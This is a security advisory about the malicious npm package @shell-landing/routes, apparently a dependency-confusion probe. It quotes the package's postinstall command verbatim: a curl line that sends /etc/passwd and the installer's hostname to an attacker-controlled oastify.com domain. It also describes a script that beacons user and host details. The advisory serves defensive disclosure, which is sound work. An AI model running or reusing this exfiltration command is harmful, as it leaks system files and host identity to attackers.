VYPR

npm · Malicious package advisory

Malware

@shell-landing/routes

MAL-2026-5429

Malicious code in @shell-landing/routes (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577)
On `npm install`, the package's postinstall hook runs `node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`. The curl invocation POSTs the contents of `/etc/passwd` to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script `scripts/scream3gg.js` hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username` and beacons each as an HTTP GET subdomain of `*.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the `@shell-landing` scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running `npm install` will leak host identity and `/etc/passwd` to attacker infrastructure.

Compromised versions (1)

  • 99.9.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.